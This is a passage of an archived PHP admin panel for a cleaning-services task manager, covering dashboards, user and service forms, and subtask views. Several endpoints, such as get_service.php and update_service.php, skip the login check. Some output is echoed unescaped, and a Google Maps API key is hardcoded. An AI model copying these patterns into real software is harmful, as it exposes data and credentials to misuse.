8, "hideBulletsCount": 50, "lineThickness": 3, "lineColor": "#2ed8b6", "title": "Completed Subtasks", "useLineColorForBulletBorder": true, "valueField": "completed_subtasks", "balloonText": "[[title]]<br /><b style='font-size: 130%'>[[value]]</b>" }], "chartCursor": { "pan": true, "valueLineEnabled": true, "valueLineBalloonEnabled": true, "cursorAlpha": 0, "valueLineAlpha": 0.2 }, "categoryField": "date", "categoryAxis": { "parseDates": true, "dashLength": 1, "minorGridEnabled": true }, "legend": { "useGraphSettings": true, "position": "top" }, "balloon": { "borderThickness": 1, "shadowAlpha": 0 }, "dataProvider": chartData }); </script> <script> // Data for the doughnut chart var completedSubTasks = <?php echo $completedSubTasks; ?>; var incompleteSubTasks = <?php echo $incompleteSubTasks; ?>; // Create Doughnut Chart var ctx = document.getElementById('subtasksPieChart').getContext('2d'); var subtasksDoughnutChart = new Chart(ctx, { type: 'doughnut', // Change type to 'doughnut' data: { labels: ['Completed Subtasks', 'Incomplete Subtasks'], datasets: [{ label: 'Subtasks Status', data: [completedSubTasks, incompleteSubTasks], // Data values for doughnut chart backgroundColor: [ '#28a745', // Green color for 'Completed Subtasks' '#fd7e14' // Red color for 'Incomplete Subtasks' ], borderColor: [ '#ffffff', // White border '#ffffff' // White border ], borderWidth: 1 }] }, options: { responsive: true, // Make chart responsive maintainAspectRatio: false, plugins: { legend: { display: true, // Show legend position: 'bottom' // Position of the legend }, } } }); </script> <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> <script> // Data for the doughnut chart for today's subtasks var todayCompletedSubTasks = <?php echo $todayCompletedSubTasks; ?>; var todayIncompleteSubTasks = <?php echo $todayIncompleteSubTasks; ?>; // Create Doughnut Chart for Today's Subtasks var ctx = document.getElementById('todaySubtasksDoughnutChart').getContext('2d'); var todaySubtasksDoughnutChart = new Chart(ctx, { type: 'doughnut', data: { labels: ['Completed Subtasks', 'Incomplete Subtasks'], datasets: [{ label: 'Today\'s Subtasks Status', data: [todayCompletedSubTasks, todayIncompleteSubTasks], // Data values for doughnut chart backgroundColor: [ '#28a745', // Green for completed '#ffc107' // Yellow for incomplete ], borderColor: [ '#ffffff', // White border '#ffffff' // White border ], borderWidth: 1 }] }, options: { responsive: true, // Make chart responsive maintainAspectRatio: false, plugins: { legend: { display: true, // Show legend position: 'bottom' // Position of the legend }, } } }); </script> <?php include('footer.php'); ?> emeraadmin/submit_user.php000064400000002036151676701240011732 0ustar00<?php // Assuming user ID of the current session is 1 for example purposes $currentUser = 1; require_once '../../Classes/User.php'; require_once '../../Service/UserService.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $first_name = $_POST['first-name']; $last_name = $_POST['last-name']; $email = $_POST['email']; $password = password_hash($_POST['password'], PASSWORD_DEFAULT); // Ensure to hash the password $phone = $_POST['phone']; $role = $_POST['role']; $status = $_POST['status']; $created_at = date('Y-m-d H:i:s'); $updated_at = date('Y-m-d H:i:s'); $userService = new UserService(); $user = new User("", $first_name, $last_name, $email, $password, $phone, $role, $status, "",$created_at, $created_at, $updated_at); if ($userService->addUser($first_name, $last_name, $email, $phone, $role, $status, $password)) { echo "User added successfully!"; } else { echo "Failed to add user."; } } else { echo "Invalid request method."; } ?> emeraadmin/reports_acceptedtasksbyusers.php000064400000007457151676701240015416 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used // Fetch accepted tasks by the assigned user $acceptedTasks = $taskService->getAcceptedTasks(); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Accepted Tasks View</h5> <span>List of accepted tasks by you</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">Accepted Tasks View</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="accepted_tasks_view_table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Assigned User</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($acceptedTasks as $task) { ?> <tr> <td><?= htmlspecialchars($task->id); ?></td> <td><?= htmlspecialchars($task->service_name); ?></td> <td><?= htmlspecialchars($task->region); ?></td> <td><?= htmlspecialchars($task->assigned_user); ?></td> <td> <a href="viewtask.php?id=<?= $System->encryptData($task->id); ?>" class="btn btn-primary">View</a> <!-- Additional actions as needed --> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> <script> $(document).ready(function() { $('#accepted_tasks_view_table').DataTable(); }); </script> emeraadmin/update_service.php000064400000003265151676701240012400 0ustar00<?php require_once '../../Service/ServiceService.php'; // Check if the request method is POST if ($_SERVER['REQUEST_METHOD'] === 'POST') { // Collect and sanitize POST data $serviceData = [ 'id' => filter_var($_POST['id'], FILTER_SANITIZE_NUMBER_INT), 'name' => filter_var($_POST['name'], FILTER_SANITIZE_STRING), 'region' => filter_var($_POST['region'], FILTER_SANITIZE_STRING), 'address_line1' => filter_var($_POST['address_line1'], FILTER_SANITIZE_STRING), 'address_line2' => filter_var($_POST['address_line2'], FILTER_SANITIZE_STRING), 'suburb' => filter_var($_POST['suburb'], FILTER_SANITIZE_STRING), 'city' => filter_var($_POST['city'], FILTER_SANITIZE_STRING), 'state' => filter_var($_POST['state'], FILTER_SANITIZE_STRING), 'postal_code' => filter_var($_POST['postal_code'], FILTER_SANITIZE_STRING), 'country' => filter_var($_POST['country'], FILTER_SANITIZE_STRING), 'phone' => filter_var($_POST['phone'], FILTER_SANITIZE_STRING), 'on_site_location' => filter_var($_POST['on_site_location'], FILTER_SANITIZE_STRING), 'latitude' => filter_var($_POST['latitude'], FILTER_SANITIZE_STRING), 'longitude' => filter_var($_POST['longitude'], FILTER_SANITIZE_STRING) ]; // Instantiate the ServiceService class $serviceService = new ServiceService(); // Call the update method $result = $serviceService->updateService($serviceData); // Provide appropriate feedback if ($result) { echo 'Service updated successfully'; } else { echo 'Failed to update service'; } } else { echo 'Invalid request'; } ?> emeraadmin/get_service.php000064400000000665151676701240011676 0ustar00<?php require_once '../../Service/ServiceService.php'; if (isset($_GET['id'])) { $serviceId = $_GET['id']; $serviceService = new ServiceService(); $service = $serviceService->getServiceById($serviceId); if ($service) { echo json_encode($service); } else { echo json_encode(['error' => 'Service not found']); } } else { echo json_encode(['error' => 'Invalid request']); } ?> emeraadmin/mark_subtask_as_completed.php000064400000003014151676701240014573 0ustar00<?php // Enable error reporting error_reporting(E_ALL); ini_set('display_errors', 1); require_once '../../Classes/Database.php'; require_once '../../Service/SubtaskService.php'; if ($_SERVER['REQUEST_METHOD'] == 'POST') { // Decode the JSON input to get the subtask IDs $input = json_decode(file_get_contents('php://input'), true); if (isset($input['subtaskIds']) && is_array($input['subtaskIds'])) { $subtaskIds = $input['subtaskIds']; $errors = []; // Create TaskService instance $SubtaskService = new SubtaskService(); // Iterate over the subtask IDs and mark them as complete foreach ($subtaskIds as $subtaskId) { $result = $SubtaskService->markSubtaskAsComplete($subtaskId); if (!$result) { $errors[] = "Failed to mark subtask ID: $subtaskId as complete"; } } if (empty($errors)) { $response = [ 'status' => 'success', 'subtaskIds' => $subtaskIds ]; } else { $response = [ 'status' => 'error', 'message' => 'Some subtasks could not be marked as complete.', 'errors' => $errors ]; } header('Content-Type: application/json'); echo json_encode($response); } else { echo json_encode(['status' => 'error', 'message' => 'Invalid input']); } } else { echo 'invalid_request'; } ?> emeraadmin/head.php000064400000010234151676701240010271 0ustar00<?php session_start(); date_default_timezone_set("Australia/Sydney"); require_once '../../Classes/System.php'; $system = new system(); // Check if the user is not logged in or is not an admin if (!$system->isLoggedIn() || !$system->isEmeraAdmin()) { header('Location: ../login.php'); exit; // Stop further execution } $companyId = $_SESSION['user_id']; ?> <!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title><?php echo isset($pageTitle) ? $pageTitle : "Emera Facility Services"; ?></title> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <script type="text/javascript" charset="utf8" src="https://code.jquery.com/jquery-3.5.1.js"></script> <link rel="icon" href="../../cropped-emera-holdings-favicon-1-32x32.png" type="image/x-icon" /> <script src="../../src/js/vendor/modernizr-2.8.3.min.js"></script> <script src="../../src/js/vendor/modernizr-2.8.3.min.js"></script> <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,400,600,700,800" rel="stylesheet"> <link rel="stylesheet" href="../../node_modules/bootstrap/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css"> <link rel="stylesheet" href="../../node_modules/ionicons/dist/css/ionicons.min.css"> <link rel="stylesheet" href="../../node_modules/icon-kit/dist/css/iconkit.min.css"> <link rel="stylesheet" href="../../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../../dist/css/theme.min.css"> <link rel="stylesheet" href="../../node_modules/flatpickr/dist/flatpickr.min.css"> <link rel="stylesheet" href="../../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../../node_modules/datatables.net-bs4/css/dataTables.bootstrap4.min.css"> <link rel="stylesheet" href="../../node_modules/tempusdominus-bootstrap-4/build/css/tempusdominus-bootstrap-4.min.css"> <link rel="stylesheet" href="../../node_modules/weather-icons/css/weather-icons.min.css"> <link rel="stylesheet" href="../../node_modules/c3/c3.min.css"> <link rel="stylesheet" href="../../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../../node_modules/owl.carousel/dist/assets/owl.carousel.css"> <link rel="stylesheet" href="../../node_modules/owl.carousel/dist/assets/owl.theme.default.css"> <link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.24/css/jquery.dataTables.css"> <link rel="stylesheet" href="../../node_modules/select2/dist/css/select2.min.css"> <script src="../../src/js/vendor/modernizr-2.8.3.min.js"></script> <script src="../../node_modules/sweetalert2/dist/sweetalert2.all.min.js"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> <style> /* Optional: You can style your map container here */ #map { height: 400px; width: 100%; } </style> <script src="https://cdn.jsdelivr.net/npm/flatpickr"></script> <script> document.addEventListener('DOMContentLoaded', function () { // Function to log previous page URL from session state // Save current page URL to session state function saveCurrentPageUrl() { var currentUrl = window.location.href; sessionStorage.setItem('previousUrl', currentUrl); } // Call saveCurrentPageUrl when navigating away window.addEventListener('beforeunload', saveCurrentPageUrl); }); </script> <script type="text/javascript" charset="utf8" src="https://code.jquery.com/jquery-3.5.1.js"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> </head> <body> <div class="wrapper"> <?php include('header.php'); ?> <div class="page-wrap"> <?php include('sidebar.php'); ?>emeraadmin/viewsubtask.php000064400000046712151676701240011751 0ustar00<?php include('head.php'); ?> <?php require_once '../../Classes/Database.php'; require_once '../../Service/SubtaskService.php'; require_once '../../Service/UserService.php'; require_once '../../Classes/System.php'; $System = new System(); $subtaskService = new SubtaskService(); $userService = new UserService(); if (!isset($_GET['id'])) { echo '<p>No subtask ID provided.</p>'; exit; } $subtaskId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$subtaskId) { echo '<script> Swal.fire({ title: "Invalid Subtask ID", text: "The URL parameter is invalid. Please go back and try again.", icon: "error", confirmButtonText: "Ok" }).then(() => window.location.href = "viewschedules.php"); </script>'; exit; } $subtask = $subtaskService->getSubtaskById($subtaskId); $users = $userService->getAllUsers(); if ($subtask->completed) { $submittedLocation = $subtaskService->getSubtaskLocation($subtaskId); if ($submittedLocation) { $latitude = $submittedLocation->latitude; $longitude = $submittedLocation->longitude; } else { // Handle the case where location is not found $latitude = null; $longitude = null; // Optionally, display an error message or take other actions echo "Location not found for the specified subtask."; } } ?> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD9O5PAsTaFPCHlIlM4XSK7ei-gaLMYpzk&callback=initMap" async defer></script> <div class="main-content"> <div class="container-fluid"> <div class="page-header row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Subtask</h5> <span>View details of a subtask</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="../../index.html"><i class="ik ik-home"></i></a></li> <li class="breadcrumb-item"><a href="#">Subtasks</a></li> <li class="breadcrumb-item active" aria-current="page">View Subtask</li> </ol> </nav> </div> </div> <div class="card"> <div class="card-header d-flex justify-content-between"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> <div> <?php if (!$subtask->assigned): ?> <button type="button" class="btn btn-primary" id="assignTaskButton">Assign Task to a cleaner </button> <?php endif; ?> <?php if ($subtask->assigned && !$subtask->completed): ?> <button type="button" class="btn btn-primary" id="assignTaskButton">Resend Task to a cleaner </button> <?php endif; ?> <?php if ($subtask->completed): ?> <!-- <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#viewTaskCompletionFormModal">View Task Completion Form</button>--> <?php endif; ?> </div> </div> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-12"> <table> <tbody> <tr> <td> <table> <tbody> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td> <h3 class="mb-0 fw-700 text-black"><?php echo $subtask->service_name; ?></h3> </td> </tr> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td> <h5 class="mb-0 fw-500 text-black"><?php echo $subtask->subtask_date ? date('F j, Y', strtotime($subtask->subtask_date)) : 'Not set'; ?></h5> </td> </tr> <tr> <td><i class="ik ik-clock icon-large"></i></td> <!-- Show time in am or pm --> <td> <h5 class="mb-0 fw-500 text-black"><?php echo $subtask->subtask_time ? date('g:i A', strtotime($subtask->subtask_time)) : 'Not set'; ?></h5> </td> </tr> <tr> <td><i class="ik ik-user icon-large"></i></td> <td> <h5 class="mb-0 fw-500 text-black"><?php echo date('F j, Y', strtotime($subtask->updated_at)); ?></h5> </td> </tr> </tbody> </table> </td> <td> <table> <tbody> <tr> <td><i class="ik ik-check-circle icon-large"></i></td> <td> <?php if ($subtask->ignored) { echo '<span class="badge badge-yellow">Ignored</span>'; } else { if ($subtask->completed) { echo '<span class="badge badge-success">Completed</span> '; } else { echo '<span class="badge badge-danger">Not Completed</span>'; } } ?> </td> </tr> <?php //if ($subtask->completed && $subtask->submitted_by_admin): ?> <!-- <tr>--> <!-- <td><i class="ik ik-calendar icon-large"></i></td>--> <!-- <td><h5 class="mb-0 fw-500 text-black">--> <?php //echo date('F j, Y, g:i A', strtotime($subtask->completed_at)); ?><!--</h5></td>--> <!-- </tr>--> <!-- --><?php //endif; ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td> <?php if ($subtask->assigned): ?> <span class="badge badge-success">Assigned</span> <?php else: ?> <span class="badge badge-danger">Not assigned</span> <?php endif; ?> </td> </tr> <?php if ($subtask->assigned): ?> <tr> <td><i class="ik ik-mail icon-large"></i></td> <td> <h5 class="mb-0 fw-500 text-black"><?php echo $subtask->assigned_to_Mobile ?: 'Not set'; ?></h5> </td> </tr> <tr> <td><i class="ik ik-check icon-large"></i></td> <td> <h5 class="mb-0 fw-500 text-black"><?php echo $subtask->assigned_Message_Rsponse ? 'Email sent successfully' : 'Unable to send email'; ?></h5> </td> </tr> <tr> <td><i class="ik ik-file-text icon-large"></i></td> <td> <h5 class="mb-0 fw-500 <?php echo $subtask->form_submission_id ? 'text-primary' : 'text-black'; ?>"> <?php if ($subtask->form_submission_id): ?> <a href="../completedsubtaskform.php?id=<?php echo $subtask->form_submission_id; ?>" target="_blank">View Submitted Form</a> <?php else: ?> <span class="badge badge-warning">Form not submitted</span> <?php endif; ?> </h5> </td> </tr> <?php if ($subtask->completed && property_exists($subtask, 'submitted_by_admin') && $subtask->submitted_by_admin): ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><span class="badge badge-warning">Marked as completed by admin</span> </h5></td> </tr> <?php endif; ?> <?php if ($subtask->form_submission_id): ?> <tr> <td><i class="fas fa-calendar-check icon-large"></i></td> <?php // Assuming $subtask->completed_at contains the datetime string $completedAt = $subtask->completed_at; // Create a new DateTime object with the original datetime $date = new DateTime($completedAt, new DateTimeZone('UTC')); // Set the timezone to Sydney $date->setTimezone(new DateTimeZone('Australia/Sydney')); // Format the date and time $formattedDate = $date->format('F j, Y, g:i a'); ?> <td> <h5 class="mb-0 fw-500 text-black"><?php echo $formattedDate; ?></h5> </td> </tr> <?php endif; ?> <?php endif; ?> </tbody> </table> </td> </tr> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } .badge-success { background-color: #28a745; color: #fff; padding: 5px 10px; border-radius: 5px; } .badge-danger { background-color: #dc3545; color: #fff; padding: 5px 10px; border-radius: 5px; } </style> </div> </div> </div> </div> <?php if ($subtask->completed && $latitude !== null && $longitude !== null): ?> <div class="card"> <div class="card-header d-flex justify-content-between"> <h3>Submitted Location</h3> </div> <div class="card-body"> <div id="map"></div> </div> </div> <script> function initMap() { // Replace these PHP variables with actual PHP values var latitude = <?php echo $latitude; ?>; // PHP variable for latitude var longitude = <?php echo $longitude; ?>; // PHP variable for longitude // Create a map centered at a specific location var map = new google.maps.Map(document.getElementById('map'), { center: {lat: latitude, lng: longitude}, zoom: 12 // Adjust zoom level as needed }); // Add a marker at the specified location var marker = new google.maps.Marker({ position: {lat: latitude, lng: longitude}, map: map, title: 'Hello World!' // Marker tooltip (optional) }); } </script> <script async defer src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD9O5PAsTaFPCHlIlM4XSK7ei-gaLMYpzk&callback=initMap"> </script> <?php endif; ?> <script> document.getElementById('assignTaskButton').addEventListener('click', function () { Swal.fire({ title: 'Enter cleaner Email', input: 'email', inputLabel: 'Cleaner Email', inputPlaceholder: 'Enter cleaner email', showCancelButton: true, confirmButtonText: 'Assign Task', showLoaderOnConfirm: true, preConfirm: (email) => { const subtaskIds = <?php echo json_encode([$subtaskId]); ?>; return fetch('../send_email_to_workers.php', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ action: 'bulk', // or 'single' depending on your logic worker_email: email, subtask_ids: subtaskIds }) }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.json(); }) .then(data => { console.log('Response from PHP:', data); // Handle response data accordingly if (data.status === 'success') { Swal.fire({ title: 'Success!', text: 'Task has been assigned successfully', icon: 'success' }).then(() => location.reload()); } else { throw new Error(data.message || 'Unknown error'); } }) .catch(error => { console.error('Fetch error:', error); Swal.showValidationMessage( `Request failed: ${error.message}` ); }); }, allowOutsideClick: () => !Swal.isLoading() }); }); </script> </div> </div> <?php include('footer.php'); ?> emeraadmin/report_rejectedtasksvyusers.php000064400000010411151676701240015254 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Service/UserService.php'; require_once '../../Classes/System.php'; // Create TaskService instance $taskService = new TaskService(); $UserService = new UserService(); $System = new System(); // Assuming System class is correctly defined and used // Fetch pending tasks with rejected users $pendingTasksWithRejectedUsers = $taskService->getPendingTasksWithRejectedUsers(); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Rejected Tasks</h5> <span> View tasks with rejected users</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">Pending Tasks View</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="pending_tasks_view_table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Rejected Users</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($pendingTasksWithRejectedUsers as $task) { ?> <tr> <td><?php echo 'TSK-000'.htmlspecialchars($task->id); ?></td> <td><?= htmlspecialchars($task->service_name); ?></td> <td><?= htmlspecialchars($task->region); ?></td> <td> <?php foreach ($task->not_accepted_users as $userId) { // Fetch and display user name based on user ID $userName = $UserService->fetchUserName($userId); // Assuming a function fetchUserName exists echo htmlspecialchars($userName) . '<br>'; } ?> </td> <td> <a href="viewtask.php?id=<?= $System->encryptData($task->id); ?>" class="btn btn-primary">View</a> <!-- Additional actions as needed --> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> <script> $(document).ready(function() { $('#pending_tasks_view_table').DataTable(); }); </script> emeraadmin/viewservice.php000064400000053004151676701240011725 0ustar00<?php include('head.php'); ?> <?php require_once '../../Classes/Database.php'; require_once '../../Service/ServiceService.php'; require_once '../../Classes/System.php'; $System = new System(); $serviceService = new ServiceService(); if (!isset($_GET['id'])) { echo '<p>No service ID provided.</p>'; exit; } $serviceId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$serviceId) { echo '<script> Swal.fire({ title: "Invalid Service ID", text: "The URL parameter is invalid. Please go back and try again.", icon: "error", confirmButtonText: "Ok" }).then(() => window.location.href = "viewservices.php"); </script>'; exit; } $service = $serviceService->getServiceById($serviceId); if (!$service) { echo '<p>Service not found.</p>'; exit; } $latitude = $service->latitude; $longitude = $service->longitude; ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Service</h5> <span>View details of a service</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="../../index.html"><i class="ik ik-home"></i></a></li> <li class="breadcrumb-item"><a href="#">Services</a></li> <li class="breadcrumb-item active" aria-current="page">View Service</li> </ol> </nav> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> </div> <div class="card-header-right"> <button type="button" class="btn btn-outline-primary" data-toggle="modal" data-target="#editServiceModal" data-service-id="<?php echo $serviceId; ?>" class="editServiceBtn">Edit</button> </div> </div> </div> </div> </div> <!-- Edit Service Modal --> <!-- Edit Service Modal --> <div class="modal fade" id="editServiceModal" tabindex="-1" role="dialog" aria-labelledby="editServiceModalLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="editServiceModalLabel">Edit Service</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <div id="edit_message"></div> <form id="editServiceForm"> <input type="hidden" id="edit_id" name="id" value="<?php echo $service->id; ?>"> <div class="form-group row"> <label for="edit_name" class="col-sm-3 col-form-label">Name:</label> <div class="col-sm-9"> <input type="text" id="edit_name" name="name" class="form-control" required value="<?php echo htmlspecialchars($service->name); ?>" placeholder="Enter name"> </div> </div> <div class="form-group row"> <label for="edit_region" class="col-sm-3 col-form-label">Region:</label> <div class="col-sm-9"> <input type="text" id="edit_region" name="region" class="form-control" required value="<?php echo htmlspecialchars($service->region); ?>" placeholder="Enter region"> </div> </div> <div class="form-group row"> <label for="edit_address_line1" class="col-sm-3 col-form-label">Address Line 1:</label> <div class="col-sm-9"> <input type="text" id="edit_address_line1" name="address_line1" class="form-control" value="<?php echo htmlspecialchars($service->address_line1); ?>" placeholder="Enter address line 1"> </div> </div> <div class="form-group row"> <label for="edit_address_line2" class="col-sm-3 col-form-label">Address Line 2:</label> <div class="col-sm-9"> <input type="text" id="edit_address_line2" name="address_line2" class="form-control" value="<?php echo htmlspecialchars($service->address_line2); ?>" placeholder="Enter address line 2"> </div> </div> <div class="form-group row"> <label for="edit_suburb" class="col-sm-3 col-form-label">Suburb:</label> <div class="col-sm-9"> <input type="text" id="edit_suburb" name="suburb" class="form-control" value="<?php echo htmlspecialchars($service->suburb); ?>" placeholder="Enter suburb"> </div> </div> <div class="form-group row"> <label for="edit_city" class="col-sm-3 col-form-label">City:</label> <div class="col-sm-9"> <input type="text" id="edit_city" name="city" class="form-control" value="<?php echo htmlspecialchars($service->city); ?>" placeholder="Enter city"> </div> </div> <div class="form-group row"> <label for="edit_state" class="col-sm-3 col-form-label">State:</label> <div class="col-sm-9"> <input type="text" id="edit_state" name="state" class="form-control" value="<?php echo htmlspecialchars($service->state); ?>" placeholder="Enter state"> </div> </div> <div class="form-group row"> <label for="edit_postal_code" class="col-sm-3 col-form-label">Postal Code:</label> <div class="col-sm-9"> <input type="text" id="edit_postal_code" name="postal_code" class="form-control" value="<?php echo htmlspecialchars($service->postal_code); ?>" placeholder="Enter postal code"> </div> </div> <div class="form-group row"> <label for="edit_country" class="col-sm-3 col-form-label">Country:</label> <div class="col-sm-9"> <input type="text" id="edit_country" name="country" class="form-control" value="<?php echo htmlspecialchars($service->country); ?>" placeholder="Enter country"> </div> </div> <div class="form-group row"> <label for="edit_phone" class="col-sm-3 col-form-label">Phone:</label> <div class="col-sm-9"> <input type="text" id="edit_phone" name="phone" class="form-control" value="<?php echo htmlspecialchars($service->phone); ?>" placeholder="Enter phone"> </div> </div> <div class="form-group row"> <label for="edit_on_site_location" class="col-sm-3 col-form-label">On Site Location:</label> <div class="col-sm-9"> <textarea id="edit_on_site_location" name="on_site_location" class="form-control" placeholder="Enter on site location"><?php echo htmlspecialchars($service->on_site_location); ?></textarea> </div> </div> <div class="form-group row"> <label for="edit_latitude" class="col-sm-3 col-form-label">Latitude:</label> <div class="col-sm-9"> <input type="text" id="edit_latitude" name="latitude" class="form-control" value="<?php echo htmlspecialchars($service->latitude); ?>" placeholder="Enter latitude"> </div> </div> <div class="form-group row"> <label for="edit_longitude" class="col-sm-3 col-form-label">Longitude:</label> <div class="col-sm-9"> <input type="text" id="edit_longitude" name="longitude" class="form-control" value="<?php echo htmlspecialchars($service->longitude); ?>" placeholder="Enter longitude"> </div> </div> </form> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="button" id="updateServiceBtn" class="btn btn-primary">Update Service</button> </div> </div> </div> </div> <script> document.addEventListener('DOMContentLoaded', function () { const editServiceButtons = document.querySelectorAll('.editServiceBtn'); editServiceButtons.forEach(button => { button.addEventListener('click', function () { const serviceId = button.getAttribute('data-service-id'); fetch(`get_service.php?id=${serviceId}`) .then(response => response.json()) .then(data => { document.getElementById('edit_id').value = data.id; document.getElementById('edit_name').value = data.name; document.getElementById('edit_region').value = data.region; document.getElementById('edit_address_line1').value = data.address_line1; document.getElementById('edit_address_line2').value = data.address_line2; document.getElementById('edit_suburb').value = data.suburb; document.getElementById('edit_city').value = data.city; document.getElementById('edit_state').value = data.state; document.getElementById('edit_postal_code').value = data.postal_code; document.getElementById('edit_country').value = data.country; document.getElementById('edit_phone').value = data.phone; document.getElementById('edit_on_site_location').value = data.on_site_location; document.getElementById('edit_latitude').value = data.latitude; document.getElementById('edit_longitude').value = data.longitude; }); }); }); document.getElementById('updateServiceBtn').addEventListener('click', function () { const formData = new FormData(document.getElementById('editServiceForm')); fetch('update_service.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { const messageDiv = document.getElementById('edit_message'); messageDiv.textContent = data; messageDiv.classList.add('alert', 'alert-success'); Swal.fire({ title: 'Success!', text: data, icon: 'success', confirmButtonText: 'Ok' }).then(() => { location.reload(); }); }) .catch(error => { const messageDiv = document.getElementById('edit_message'); messageDiv.textContent = 'Error: ' + error; messageDiv.classList.add('alert', 'alert-danger'); Swal.fire({ title: 'Error!', text: error, icon: 'error', confirmButtonText: 'Ok' }); }); }); }); </script> <div class="card"> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-6"> <h4>General Information</h4> <table> <tbody> <tr> <td><i class="ik ik-layers icon-large"></i></td> <td><h3 class="mb-0 fw-700 text-black"><?php echo $service->name?: 'Name not provided'; ?></h3></td> </tr> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->region; ?></h5></td> </tr> </tbody> </table> <h4>Address Details</h4> <table> <tbody> <tr> <td><i class="ik ik-home icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->address_line1 ?: 'Address Line 1 not provided'; ?></h5></td> <td><i class="ik ik-home icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->address_line2 ?: 'Address Line 2 not provided'; ?></h5></td> </tr> <tr> <td><i class="ik ik-map icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo 